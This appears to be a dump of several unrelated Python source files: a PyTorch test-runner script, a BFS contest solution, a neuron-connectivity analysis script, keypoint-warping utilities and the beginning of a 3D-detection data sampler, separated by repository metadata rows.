    'distributed/test_distributed_spawn': test_distributed,
}
def parse_test_module(test):
    """Strip a 'module.TestClass.test_method' spec down to its module name."""
    return test.partition('.')[0]
class TestChoices(list):
    """A list of test names whose membership test matches on module name,
    so 'module.TestClass.test_method' counts as contained when 'module' is."""

    def __init__(self, *args, **kwargs):
        super().__init__(args[0])

    def __contains__(self, item):
        return super().__contains__(parse_test_module(item))
def parse_args():
    """Build and evaluate the command-line interface of the test runner."""
    parser = argparse.ArgumentParser(
        description='Run the PyTorch unit test suite',
        epilog='where TESTS is any of: {}'.format(', '.join(TESTS)))
    parser.add_argument(
        '-v',
        '--verbose',
        action='count',
        default=0,
        help='print verbose information and test-by-test results')
    # FIX: previously the option string '--jit' was passed twice to this
    # add_argument call; the duplicate was redundant and has been removed.
    parser.add_argument(
        '--jit',
        action='store_true',
        help='run all jit tests')
    parser.add_argument(
        '-pt', '--pytest', action='store_true',
        help='If true, use `pytest` to execute the tests. E.g., this runs '
             'TestTorch with pytest in verbose and coverage mode: '
             'python run_test.py -vci torch -pt')
    parser.add_argument(
        '-c', '--coverage', action='store_true', help='enable coverage',
        default=PYTORCH_COLLECT_COVERAGE)
    parser.add_argument(
        '-i',
        '--include',
        nargs='+',
        choices=TestChoices(TESTS),
        default=TESTS,
        metavar='TESTS',
        help='select a set of tests to include (defaults to ALL tests).'
             ' tests can be specified with module name, module.TestClass'
             ' or module.TestClass.test_method')
    parser.add_argument(
        '-x',
        '--exclude',
        nargs='+',
        choices=TESTS,
        metavar='TESTS',
        default=[],
        help='select a set of tests to exclude')
    parser.add_argument(
        '-f',
        '--first',
        choices=TESTS,
        metavar='TESTS',
        help='select the test to start from (excludes previous tests)')
    parser.add_argument(
        '-l',
        '--last',
        choices=TESTS,
        metavar='TESTS',
        help='select the last test to run (excludes following tests)')
    parser.add_argument(
        '--bring-to-front',
        nargs='+',
        choices=TestChoices(TESTS),
        default=[],
        metavar='TESTS',
        help='select a set of tests to run first. This can be used in situations'
             ' where you want to run all tests, but care more about some set, '
             'e.g. after making a change to a specific component')
    parser.add_argument(
        '--ignore-win-blocklist',
        action='store_true',
        help='always run blocklisted windows tests')
    parser.add_argument(
        '--determine-from',
        help='File of affected source filenames to determine which tests to run.')
    parser.add_argument(
        '--continue-through-error',
        action='store_true',
        help='Runs the full test suite despite one of the tests failing')
    parser.add_argument(
        'additional_unittest_args',
        nargs='*',
        help='additional arguments passed through to unittest, e.g., '
             'python run_test.py -i sparse -- TestSparse.test_factory_size_check')
    parser.add_argument(
        '--export-past-test-times',
        nargs='?',
        type=str,
        const=TEST_TIMES_FILE,
        help='dumps test times from previous S3 stats into a file, format JSON',
    )
    parser.add_argument(
        '--shard',
        nargs=2,
        type=int,
        help='runs a shard of the tests (taking into account other selections), e.g., '
             '--shard 2 3 will break up the selected tests into 3 shards and run the tests '
             'in the 2nd shard (the first number should not exceed the second)',
    )
    parser.add_argument(
        '--exclude-jit-executor',
        action='store_true',
        help='exclude tests that are run for a specific jit config'
    )
    return parser.parse_args()
def find_test_index(test, selected_tests, find_last_index=False):
    """Locate *test* in *selected_tests* by prefix match.

    Supports lists containing several consecutive entries from the same
    module (e.g. 'torch.TestTorch.test_acos', 'torch.TestTorch.test_tan').
    Used by --first (find_last_index=False) and --last
    (find_last_index=True) when slicing the selected-test list.

    Args:
        test (str): Name of test to lookup
        selected_tests (list): List of tests
        find_last_index (bool, optional): should we lookup the index of first or last
            occurrence (first is default)

    Returns:
        index of the first or last occurrence of the given test, or -1 when
        absent
    """
    found = -1
    for position, candidate in enumerate(selected_tests):
        if candidate.startswith(test):
            found = position
            if not find_last_index:
                break
    return found
def exclude_tests(exclude_list, selected_tests, exclude_message=None):
    """Remove from *selected_tests* (in place) every entry that starts with
    any prefix in *exclude_list*; optionally log each exclusion.

    Returns the (mutated) *selected_tests* list for convenience.
    """
    for prefix in exclude_list:
        # Iterate over a snapshot so removal is safe mid-loop.
        for candidate in selected_tests[:]:
            if candidate.startswith(prefix):
                if exclude_message is not None:
                    print_to_stderr('Excluding {} {}'.format(candidate, exclude_message))
                selected_tests.remove(candidate)
    return selected_tests
def get_selected_tests(options):
    """Apply every selection option (--include, --bring-to-front, --first,
    --last, --shard, exclusions, platform blocklists) and return the final
    ordered list of tests to run."""
    selected_tests = options.include

    # Move the requested tests to the front, preserving order of the rest.
    if options.bring_to_front:
        to_front = set(options.bring_to_front)
        selected_tests = options.bring_to_front + list(filter(lambda name: name not in to_front,
                                                              selected_tests))

    if options.first:
        first_index = find_test_index(options.first, selected_tests)
        selected_tests = selected_tests[first_index:]

    if options.last:
        last_index = find_test_index(options.last, selected_tests, find_last_index=True)
        selected_tests = selected_tests[:last_index + 1]

    if options.shard:
        assert len(options.shard) == 2, "Unexpected shard format"
        assert min(options.shard) > 0, "Shards must be positive numbers"
        which_shard, num_shards = options.shard
        assert which_shard <= num_shards, "Selected shard must be less or equal that total number of shards"
        # NOTE(review): the message says "less than" but the check is <=.
        assert num_shards <= len(selected_tests), f"Number of shards must be less than {len(selected_tests)}"
        selected_tests = get_shard(which_shard, num_shards, selected_tests)

    if options.exclude_jit_executor:
        options.exclude.extend(JIT_EXECUTOR_TESTS)

    selected_tests = exclude_tests(options.exclude, selected_tests)

    if sys.platform == 'win32' and not options.ignore_win_blocklist:
        target_arch = os.environ.get('VSCMD_ARG_TGT_ARCH')
        if target_arch != 'x64':
            # NOTE(review): these appended names lack the 'test_' prefix that
            # the corresponding TESTS entries carry, so the prefix match in
            # exclude_tests() appears to never hit them -- TODO confirm
            # whether the intent was 'test_cpp_extensions_aot_no_ninja' etc.
            WINDOWS_BLOCKLIST.append('cpp_extensions_aot_no_ninja')
            WINDOWS_BLOCKLIST.append('cpp_extensions_aot_ninja')
            WINDOWS_BLOCKLIST.append('cpp_extensions_jit')
            WINDOWS_BLOCKLIST.append('jit')
            WINDOWS_BLOCKLIST.append('jit_fuser')

        selected_tests = exclude_tests(WINDOWS_BLOCKLIST, selected_tests, 'on Windows')

    elif TEST_WITH_ROCM:
        selected_tests = exclude_tests(ROCM_BLOCKLIST, selected_tests, 'on ROCm')

    return selected_tests
def test_impact_of_file(filename):
"""Determine what class of impact this file has on test runs.
Possible values:
TORCH - torch python code
CAFFE2 - caffe2 python code
TEST - torch test code
UNKNOWN - may affect all tests
NONE - known to have no effect on test outcome
CI - CI configuration files
"""
parts = filename.split(os.sep)
if parts[0] in ['.jenkins', '.circleci']:
return 'CI'
if parts[0] in ['docs', 'scripts', 'CODEOWNERS', 'README.md']:
return 'NONE'
elif parts[0] == 'torch':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TORCH'
elif parts[0] == 'caffe2':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'CAFFE2'
elif parts[0] == 'test':
if parts[-1].endswith('.py') or parts[-1].endswith('.pyi'):
return 'TEST'
return 'UNKNOWN'
def log_test_reason(file_type, filename, test, options):
    """In verbose mode, report why a changed file triggers *test*."""
    if not options.verbose:
        return
    print_to_stderr(
        'Determination found {} file {} -- running {}'.format(
            file_type, filename, test))
def get_dep_modules(test):
    """Return the set of module names imported (transitively) by the given
    test file, using modulefinder; results are memoized in
    _DEP_MODULES_CACHE."""
    # Cache results in case of repetition
    if test in _DEP_MODULES_CACHE:
        return _DEP_MODULES_CACHE[test]

    repo_root = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    test_location = os.path.join(repo_root, 'test', test + '.py')
    finder = modulefinder.ModuleFinder(
        # Ideally exclude all third party modules, to speed up calculation.
        excludes=[
            'scipy',
            'numpy',
            'numba',
            'multiprocessing',
            'sklearn',
            'setuptools',
            'hypothesis',
            'llvmlite',
            'joblib',
            'email',
            'importlib',
            'unittest',
            'urllib',
            'json',
            'collections',
            # Modules below are excluded because they are hitting https://bugs.python.org/issue40350
            # Trigger AttributeError: 'NoneType' object has no attribute 'is_package'
            'mpl_toolkits',
            'google',
            'onnx',
            # Triggers RecursionError
            'mypy'
        ],
    )
    # HACK: some platforms default to ascii, so we can't just run_script :(
    with open(test_location, 'r', encoding='utf-8') as fp:
        finder.load_module('__main__', fp, test_location, ('', 'r', 1))

    dep_modules = set(finder.modules.keys())
    _DEP_MODULES_CACHE[test] = dep_modules
    return dep_modules
def determine_target(target_det_list, test, touched_files, options):
    """Decide whether *test* should run given the files touched by a patch.

    Tests outside *target_det_list* always run (they're cheaper to run than
    to analyze).  Otherwise the test runs if any touched file is CI config,
    an unclassifiable file, or a Python module the test (transitively)
    imports.
    """
    test = parse_test_module(test)
    # Some tests are faster to execute than to determine.
    if test not in target_det_list:
        if options.verbose:
            print_to_stderr(f'Running {test} without determination')
        return True
    # HACK: "no_ninja" is not a real module
    if test.endswith('_no_ninja'):
        test = test[:(-1 * len('_no_ninja'))]
    if test.endswith('_ninja'):
        test = test[:(-1 * len('_ninja'))]

    dep_modules = get_dep_modules(test)

    for touched_file in touched_files:
        file_type = test_impact_of_file(touched_file)
        if file_type == 'NONE':
            continue
        elif file_type == 'CI':
            # Force all tests to run if any change is made to the CI
            # configurations.
            log_test_reason(file_type, touched_file, test, options)
            return True
        elif file_type == 'UNKNOWN':
            # Assume uncategorized source files can affect every test.
            log_test_reason(file_type, touched_file, test, options)
            return True
        elif file_type in ['TORCH', 'CAFFE2', 'TEST']:
            # Convert the touched path to its dotted module name.
            parts = os.path.splitext(touched_file)[0].split(os.sep)
            touched_module = ".".join(parts)
            # test/ path does not have a "test." namespace
            if touched_module.startswith('test.'):
                touched_module = touched_module.split('test.')[1]
            if (
                touched_module in dep_modules
                or touched_module == test.replace('/', '.')
            ):
                log_test_reason(file_type, touched_file, test, options)
                return True

    # If nothing has determined the test has run, don't run the test.
    if options.verbose:
        print_to_stderr(f'Determination is skipping {test}')

    return False
def run_test_module(test: str, test_directory: str, options) -> Optional[str]:
    """Run a single test module; return None on success, else a message."""
    test_module = parse_test_module(test)
    # The timestamp helps diagnose which tests are slow in CI logs.
    print_to_stderr(f'Running {test} ... [{datetime.now()}]')
    handler = CUSTOM_HANDLERS.get(test_module, run_test)
    return_code = handler(test_module, test_directory, options)
    # bool is a subclass of int, so rule it out explicitly.
    assert isinstance(return_code, int) and not isinstance(
        return_code, bool), 'Return code should be an integer'
    if return_code == 0:
        return None
    message = f'{test} failed!'
    if return_code < 0:
        # subprocess.Popen reports a child killed by signal N as -N.
        signal_name = SIGNALS_TO_NAMES_DICT[-return_code]
        message += f' Received signal: {signal_name}'
    return message
def export_S3_test_times(test_times_filename: str, test_times: Dict[str, float]) -> None:
    """Serialize test timing data pulled from S3 into a local JSON file."""
    if os.path.exists(test_times_filename):
        print(f'Overwriting existent file: {test_times_filename}')
    with open(test_times_filename, 'w+') as file:
        job_times_json = get_job_times_json(test_times)
        json.dump(job_times_json, file, indent='    ', separators=(',', ': '))
        file.write('\n')  # trailing newline so the file ends cleanly
def main():
    """Entry point: select, determine, and run the requested test modules."""
    options = parse_args()
    # Export-only mode: dump past S3 test times and exit without running tests.
    test_times_filename = options.export_past_test_times
    if test_times_filename:
        print(f'Exporting past test times from S3 to {test_times_filename}, no tests will be run.')
        export_S3_test_times(test_times_filename, pull_job_times_from_S3())
        return
    test_directory = os.path.dirname(os.path.abspath(__file__))
    selected_tests = get_selected_tests(options)
    if options.verbose:
        print_to_stderr('Selected tests: {}'.format(', '.join(selected_tests)))
    if options.coverage and not PYTORCH_COLLECT_COVERAGE:
        shell(['coverage', 'erase'])
    if options.jit:
        # NOTE: this filters from the full TESTS list, not selected_tests.
        selected_tests = filter(lambda test_name: "jit" in test_name, TESTS)
    # Target determination: prune selected_tests down to those plausibly
    # affected by the touched files listed in options.determine_from.
    if options.determine_from is not None and os.path.exists(options.determine_from):
        slow_tests = get_slow_tests_based_on_S3()
        print('Added the following tests to target_det tests as calculated based on S3:')
        print(slow_tests)
        with open(options.determine_from, 'r') as fh:
            touched_files = [
                os.path.normpath(name.strip()) for name in fh.read().split('\n')
                if len(name.strip()) > 0
            ]
        # HACK: Ensure the 'test' paths can be traversed by Modulefinder
        sys.path.append('test')
        selected_tests = [
            test for test in selected_tests
            if determine_target(TARGET_DET_LIST + slow_tests, test, touched_files, options)
        ]
        sys.path.remove('test')
    has_failed = False
    failure_messages = []
    try:
        for test in selected_tests:
            # Deep-copy so per-test tweaks (e.g. pytest flag) don't leak.
            options_clone = copy.deepcopy(options)
            if test in USE_PYTEST_LIST:
                options_clone.pytest = True
            err_message = run_test_module(test, test_directory, options_clone)
            if err_message is None:
                continue
            has_failed = True
            failure_messages.append(err_message)
            # Without continue_through_error the first failure aborts
            # (the RuntimeError propagates after the finally block runs).
            if not options_clone.continue_through_error:
                raise RuntimeError(err_message)
            print_to_stderr(err_message)
    finally:
        # Coverage collation runs whether or not the test loop failed.
        if options.coverage:
            from coverage import Coverage
            test_dir = os.path.dirname(os.path.abspath(__file__))
            with set_cwd(test_dir):
                cov = Coverage()
                if PYTORCH_COLLECT_COVERAGE:
                    cov.load()
                    cov.combine(strict=False)
                    cov.save()
                if not PYTORCH_COLLECT_COVERAGE:
                    cov.html_report()
    # In continue-through-error mode, report all failures then exit non-zero.
    if options.continue_through_error and has_failed:
        for err in failure_messages:
            print_to_stderr(err)
        sys.exit(1)
if __name__ == '__main__':
    main()
| 37.835145 | 121 | 0.66361 |
411aaecfd27f1ddf416a56cfc0cb25271ff91d8f | 758 | py | Python | src/data/287.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/287.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | src/data/287.py | NULLCT/LOMC | 79a16474a8f21310e0fb47e536d527dd5dc6d655 | [
"MIT"
] | null | null | null | # -*- coding: UTF-8 -*-
import sys
# Rebind input to the raw stdin reader — much faster than builtin input()
# for large inputs (trailing newlines are tolerated by split()).
input = sys.stdin.readline
# N vertices, Q queries.
N, Q = map(int, input().split())
# 1-indexed adjacency list; N-1 undirected edges (a tree, presumably).
adj = [[] for n in range(N + 1)]
for i in range(N - 1):
    a, b = map(int, input().split())
    adj[a].append(b)
    adj[b].append(a)
def BFS(vnum, sv, adj):
    """Breadth-first search over a 1-indexed adjacency list.

    Args:
        vnum: number of vertices (vertices are numbered 1..vnum).
        sv: source vertex.
        adj: adjacency list; adj[v] lists the neighbours of v.

    Returns:
        Distances (in edges) from sv for vertices 1..vnum, in order;
        unreachable vertices keep -1.
    """
    from collections import deque
    dist = [-1] * (vnum + 1)
    dist[sv] = 0
    que = deque([sv])
    while que:
        v = que.popleft()
        for x in adj[v]:
            if dist[x] != -1:  # already visited
                continue
            dist[x] = dist[v] + 1
            que.append(x)
    return dist[1:]  # drop the unused 0 slot
# Depths from vertex 1 to every vertex, computed once; vertex v sits at
# index v-1 because BFS returns dist[1:].
first_bfs = BFS(N, 1, adj)
for q in range(Q):
    c, d = map(int, input().split())
    # In a tree, depths relative to a common root share parity with the
    # c-d path length, so an odd depth difference means an odd path.
    if abs(first_bfs[c - 1] - first_bfs[d - 1]) % 2:
        print('Road')
    else:
        print('Town')
| 20.486486 | 52 | 0.490765 |
5e483c9c038493a8c3270f624a5f86ff7d79b795 | 7,456 | py | Python | analysis/mf_grc_analysis/1share/2share_by_dist_gen_210117.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null | analysis/mf_grc_analysis/1share/2share_by_dist_gen_210117.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null | analysis/mf_grc_analysis/1share/2share_by_dist_gen_210117.py | htem/cb2_project_analysis | a677cbadc7e3bf0074975a94ed1d06b4801899c0 | [
"MIT"
] | null | null | null |
import os
import sys
import importlib
from collections import defaultdict
# Make the project-local analysis helpers importable.
sys.path.insert(0, '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc')
from tools_pattern import get_eucledean_dist
'''Load data'''
import compress_pickle
# NOTE(review): this first load is immediately superseded by the
# restricted_z load below; it appears to be leftover.
fname = '/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/mf_grc_model/input_graph_201114.gz'
input_graph = compress_pickle.load(fname)
script_n = '2share_by_dist_210117'
n_samples = 200
# NOTE(review): duplicate import of compress_pickle (harmless).
import compress_pickle
input_graph = compress_pickle.load('/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/mf_grc_model/input_graph_201114_restricted_z.gz')
# input_graph = compress_pickle.load('/n/groups/htem/Segmentation/shared-nondev/cb2_segmentation/analysis_mf_grc/mf_grc_model/input_graph_201114.gz')
grcs = [k for k in input_graph.grcs.keys()]
# NOTE(review): z/x bounds below are only used by the commented-out
# plotting loop; they are dead configuration at present.
# z_min = 15
# z_max = 35
z_min = 20000
z_max = 30000
x_min = 360000
x_max = 520000
# for mf_id, mf in input_graph.mfs.items():
#     rosette_capacities = mf.get_rosette_loc_capacity()
#     for rosette_loc, claw_count in rosette_capacities.items():
#         x, y, z = rosette_loc
#         if x < 360000 or x > 520000:
#             continue
#         if z < z_min*1000 or z > z_max*1000:
#             continue
#         mpd.add_data_point(
#             x=x/1000,
#             y=y/1000,
#             z=z/1000,
#             claw_count=claw_count,
#         )
def get_prob(in_graph):
    """Soma-to-soma distances for GrC pairs sharing at least two rosettes.

    Args:
        in_graph: graph whose .grcs maps grc_id -> object exposing
            .edges (iterable of pairs whose second element is presumably a
            rosette identifier — confirm against the graph model) and
            .soma_loc.

    Returns:
        List, over every unordered pair of distinct GrCs whose rosette
        sets overlap in >= 2 elements, of the pair's soma distance
        divided by 1000 (nm -> um, judging by the commented plotting
        code above — TODO confirm).
    """
    common_pair_dist = []
    grc_ids = list(in_graph.grcs)
    # Pre-compute every GrC's rosette set once. The original rebuilt the
    # inner set for each of the n^2 pairs and kept an O(n^2) `processed`
    # set just to deduplicate; iterating index pairs a < b achieves the
    # same pair ordering with no extra memory. The unused n_pairs /
    # n_common_pairs counters were dropped.
    rosettes = [set(mf[1] for mf in in_graph.grcs[gid].edges) for gid in grc_ids]
    for a in range(len(grc_ids)):
        for b in range(a + 1, len(grc_ids)):
            if len(rosettes[a] & rosettes[b]) >= 2:
                dist = get_eucledean_dist(
                    in_graph.grcs[grc_ids[a]].soma_loc,
                    in_graph.grcs[grc_ids[b]].soma_loc,
                )
                common_pair_dist.append(dist / 1000)
    return common_pair_dist
# Dump the observed (unrandomized) pairwise-distance distribution.
print(f'Generating {script_n}_observed')
observed_data = [get_prob(input_graph)]
compress_pickle.dump((
    observed_data,
), f"{script_n}_observed.gz")
# "naive3" null model: n_samples randomization passes with the parameter
# set below (commented kwargs record alternatives that were tried).
print('Generating naive_data3')
naive_data3 = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        mf_dist_margin=4000,
        single_connection_per_pair=True,
        constant_grc_degree=4,
        constant_dendrite_length=15000,
        # always_pick_closest_rosette=True,
        # preserve_mf_degree=True,
        # approximate_in_degree=True,
        # local_lengths=True,
    )
    naive_data3.append(get_prob(input_graph))
compress_pickle.dump((
    naive_data3,
), f"{script_n}_naive3_{n_samples}.gz")
# BUG FIX: the original aborted here with a bare `asdf` expression,
# which crashed with a confusing NameError. Stop explicitly instead;
# everything below this point is intentionally skipped.
sys.exit()
# NOTE(review): the script deliberately stops just above this point, so
# every sampling pass below is dead code unless that early exit is
# removed. Each pass follows the same template: randomize the graph
# n_samples times with a particular kwarg combination, collect
# get_prob() for each sample, and pickle the result.
# naive
print(f'Generating naive_data2')
naive_data2 = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        # mf_dist_margin=mf_dist_margin,
        single_connection_per_pair=True,
        constant_grc_degree=4,
        constant_dendrite_length=15000,
        # always_pick_closest_rosette=True,
        # preserve_mf_degree=True,
        # approximate_in_degree=True,
        # local_lengths=True,
    )
    naive_data2.append(get_prob(input_graph))
compress_pickle.dump((
    naive_data2,
), f"{script_n}_naive2_{n_samples}.gz")
# local_random ex30
print(f'Generating ex30')
ex30 = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        single_connection_per_pair=True,
        constant_grc_degree=4,
        dendrite_range=(0, 30000),
    )
    ex30.append(get_prob(input_graph))
compress_pickle.dump((
    ex30,
), f"{script_n}_localex30_{n_samples}.gz")
# local_random ex50
print(f'Generating ex50')
ex50 = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        single_connection_per_pair=True,
        constant_grc_degree=4,
        dendrite_range=(0, 50000),
    )
    ex50.append(get_prob(input_graph))
compress_pickle.dump((
    ex50,
), f"{script_n}_localex50_{n_samples}.gz")
# naive
print(f'Generating naive_data')
naive_data = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        # mf_dist_margin=mf_dist_margin,
        single_connection_per_pair=True,
        constant_grc_degree=4,
        constant_dendrite_length=15000,
        always_pick_closest_rosette=True,
        # preserve_mf_degree=True,
        # approximate_in_degree=True,
        # local_lengths=True,
    )
    naive_data.append(get_prob(input_graph))
compress_pickle.dump((
    naive_data,
), f"{script_n}_naive_{n_samples}.gz")
# correct
# - gt dendrite length
# - gt grc degree
# - gt mf degree
print(f'Generating random_correct_data')
random_correct_data = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        mf_dist_margin=4000,
        single_connection_per_pair=True,
        # constant_grc_degree=4,
        # constant_dendrite_length=15000,
        # always_pick_closest_rosette=True,
        preserve_mf_degree=True,
        # approximate_in_degree=True,
        # local_lengths=True,
    )
    random_correct_data.append(get_prob(input_graph))
compress_pickle.dump((
    random_correct_data,
), f"{script_n}_random_correct_{n_samples}.gz")
print(f'Generating random_fixed_length_data')
random_fixed_length_data = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        mf_dist_margin=1000,
        single_connection_per_pair=True,
        # constant_grc_degree=4,
        constant_dendrite_length=15000,
        # always_pick_closest_rosette=True,
        preserve_mf_degree=True,
        # approximate_in_degree=True,
        # local_lengths=True,
    )
    random_fixed_length_data.append(get_prob(input_graph))
compress_pickle.dump((
    random_fixed_length_data,
), f"{script_n}_random_fixed_length_{n_samples}.gz")
print(f'Generating random_constant_grc_degree_data')
random_constant_grc_degree_data = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        mf_dist_margin=4000,
        single_connection_per_pair=True,
        constant_grc_degree=4,
        # constant_dendrite_length=15000,
        # always_pick_closest_rosette=True,
        preserve_mf_degree=True,
        # approximate_in_degree=True,
        # local_lengths=True,
    )
    random_constant_grc_degree_data.append(get_prob(input_graph))
compress_pickle.dump((
    random_constant_grc_degree_data,
), f"{script_n}_random_constant_grc_degree_{n_samples}.gz")
print(f'Generating random_no_gt_mf_degree_data')
random_no_gt_mf_degree_data = []
for i in range(n_samples):
    input_graph.randomize_graph_by_grc(
        mf_dist_margin=4000,
        single_connection_per_pair=True,
        # constant_grc_degree=4,
        # constant_dendrite_length=15000,
        # always_pick_closest_rosette=True,
        # preserve_mf_degree=True,
        # approximate_in_degree=True,
        # local_lengths=True,
    )
    random_no_gt_mf_degree_data.append(get_prob(input_graph))
compress_pickle.dump((
    random_no_gt_mf_degree_data,
), f"{script_n}_random_no_gt_mf_degree_{n_samples}.gz")
| 27.925094 | 160 | 0.683208 |
54cba42ab4a78eaa2a343723f3388fb74de689ca | 1,831 | py | Python | utils/utils_keypoints.py | atapin/Caricature-Your-Face | 92fbf9156f0522bcc2592673c23a718e20b5114f | [
"MIT"
] | 27 | 2020-12-30T23:45:05.000Z | 2022-03-10T09:15:39.000Z | utils/utils_keypoints.py | TrueMatthewKirkham/Caricature-Your-Face | 205610481ebda3405a74fba801b7dd55afaff89a | [
"MIT"
] | 3 | 2021-01-01T07:09:54.000Z | 2022-02-21T21:18:10.000Z | utils/utils_keypoints.py | TrueMatthewKirkham/Caricature-Your-Face | 205610481ebda3405a74fba801b7dd55afaff89a | [
"MIT"
] | 4 | 2020-12-31T15:31:24.000Z | 2021-12-05T22:40:53.000Z | # Code from https://github.com/sunniesuhyoung/DST
import torch
import numpy as np
from warp import umeyama
def init_keypoint_params(input_im, content_path, content_pts, style_pts, device, border_num_pts=80):
    """Align style keypoints to the content frame and add fixed border anchors.

    NOTE(review): `content_path` is accepted but never used.

    Args:
        input_im: image tensor; only size(2)/size(3) (H, W) are read.
        content_pts: [K, 2] content keypoints.
        style_pts: [K, 2] style keypoints.
        device: target device for the returned tensors.
        border_num_pts: number of anchor points added per image side.

    Returns:
        (content_pts, target_pts, border_pts, no_flow), all moved to `device`.
    """
    # Align points with linear similarity transformation
    T = umeyama(src=content_pts.data.cpu().numpy(), dst=style_pts.data.cpu().numpy(), estimate_scale=True)
    T = torch.from_numpy(T).float()
    # Map style points through the inverse similarity (homogeneous
    # coordinates, then drop the ones-row) into the content frame.
    target_pts_padded = torch.cat((style_pts, torch.ones((style_pts.size(0), 1))), 1)
    target_pts = torch.matmul(torch.inverse(T), torch.transpose(target_pts_padded, 0, 1))
    target_pts = torch.transpose(target_pts[:2], 0, 1)
    # Add fixed points at image borders to prevent weird warping
    height = input_im.size(2)
    width = input_im.size(3)
    w_d = width//(border_num_pts+1)
    w_pts = w_d*(np.arange(border_num_pts)+1)
    h_d = height//(border_num_pts+1)
    h_pts = h_d*(np.arange(border_num_pts)+1)
    # Four corners plus evenly spaced points along each of the four sides.
    border_pts = [[0, 0], [height-1, 0], [0, width-1], [height-1, width-1]]
    for i in range(border_num_pts):
        border_pts.append([h_pts[i], 0])
        border_pts.append([h_pts[i], width-1])
        border_pts.append([0, w_pts[i]])
        border_pts.append([height-1, w_pts[i]])
    border_pts = torch.from_numpy(np.asarray(border_pts)).float()
    # Border anchors carry zero displacement so the warp pins them down.
    no_flow = [[0., 0.]] * len(border_pts)
    no_flow = torch.from_numpy(np.asarray(no_flow)).float()
    return content_pts.to(device), target_pts.to(device), border_pts.to(device), no_flow.to(device)
def gen_dst_pts_keypoints(src_pts, thetas, no_flow, border_pts):
    """Offset the keypoints by their flow and append the fixed border anchors.

    Returns (src_pts_aug, dst_pts_aug, flow_pts_aug): sources, displaced
    destinations, and flows, each with the zero-motion border points
    concatenated at the end.
    """
    moved = src_pts + thetas
    # Border anchors never move: they appear unchanged in both the source
    # and destination sets, with zero flow.
    return (
        torch.cat([src_pts, border_pts], 0),
        torch.cat([moved, border_pts], 0),
        torch.cat([thetas, no_flow], 0),
    )
| 36.62 | 106 | 0.69361 |
8680e5894c8ecb258e27f2401f29dcb2b7f174c3 | 36,468 | py | Python | det3d/core/sampler/preprocess.py | jianrenw/SOD-TGNN | 2533508f9565edee71af96202086ecc688b3dfe0 | [
"MIT"
] | 1 | 2022-03-29T12:04:32.000Z | 2022-03-29T12:04:32.000Z | det3d/core/sampler/preprocess.py | jianrenw/SOD-TGNN | 2533508f9565edee71af96202086ecc688b3dfe0 | [
"MIT"
] | 1 | 2022-02-18T08:17:52.000Z | 2022-03-30T07:40:24.000Z | det3d/core/sampler/preprocess.py | jianrenw/SOD-TGNN | 2533508f9565edee71af96202086ecc688b3dfe0 | [
"MIT"
] | null | null | null | import abc
import sys
import time
from collections import OrderedDict
from functools import reduce
import numba
import numpy as np
from det3d.core.bbox import box_np_ops
from det3d.core.bbox.geometry import (
is_line_segment_intersection_jit,
points_in_convex_polygon_3d_jit,
points_in_convex_polygon_jit,
)
import copy
class BatchSampler:
    """Cyclic sampler over a fixed list, optionally reshuffled every pass.

    The final batch of a pass may be shorter than requested; the sampler
    then resets (and reshuffles if enabled).
    NOTE(review): `epoch` and `drop_reminder` are stored but never used.
    """

    def __init__(
        self, sampled_list, name=None, epoch=None, shuffle=True, drop_reminder=False
    ):
        self._sampled_list = sampled_list
        self._example_num = len(sampled_list)
        self._indices = np.arange(self._example_num)
        self._shuffle = shuffle
        if shuffle:
            np.random.shuffle(self._indices)
        self._idx = 0
        self._name = name
        self._epoch = epoch
        self._epoch_counter = 0
        self._drop_reminder = drop_reminder

    def _sample(self, num):
        """Return the next `num` indices; a short tail triggers a reset."""
        end = self._idx + num
        if end >= self._example_num:
            picked = self._indices[self._idx:].copy()
            self._reset()
        else:
            picked = self._indices[self._idx:end]
            self._idx = end
        return picked

    def _reset(self):
        """Start a new pass, reshuffling when enabled."""
        if self._shuffle:
            np.random.shuffle(self._indices)
        self._idx = 0

    def sample(self, num):
        """Return up to `num` elements from the underlying list."""
        return [self._sampled_list[k] for k in self._sample(num)]
class DataBasePreprocessing:
    """Callable base class for db_infos preprocessing steps."""

    def __call__(self, db_infos):
        return self._preprocess(db_infos)

    # FIX: abc.abstractclassmethod is deprecated (since Python 3.3) and was
    # wrong here anyway — subclasses override _preprocess as an instance
    # method. Note the class does not use ABCMeta, so abstractness is not
    # enforced either way; the decorator is documentation.
    @abc.abstractmethod
    def _preprocess(self, db_infos):
        """Filter/transform db_infos; implemented by subclasses."""
        pass
class DBFilterByDifficulty(DataBasePreprocessing):
    """Drop sampled objects whose difficulty is in the removed list."""

    def __init__(self, removed_difficulties, logger=None):
        self._removed_difficulties = removed_difficulties
        # BUG FIX: the declared default logger=None crashed on logger.info.
        if logger is not None:
            logger.info(f"{removed_difficulties}")

    def _preprocess(self, db_infos):
        """Return a new dict keeping only infos with allowed difficulty."""
        new_db_infos = {}
        for key, dinfos in db_infos.items():
            new_db_infos[key] = [
                info
                for info in dinfos
                if info["difficulty"] not in self._removed_difficulties
            ]
        return new_db_infos
class DBFilterByMinNumPoint(DataBasePreprocessing):
    """Drop sampled objects with fewer than a per-class minimum of points."""

    def __init__(self, min_gt_point_dict, logger=None):
        self._min_gt_point_dict = min_gt_point_dict
        # BUG FIX: the declared default logger=None crashed on logger.info.
        if logger is not None:
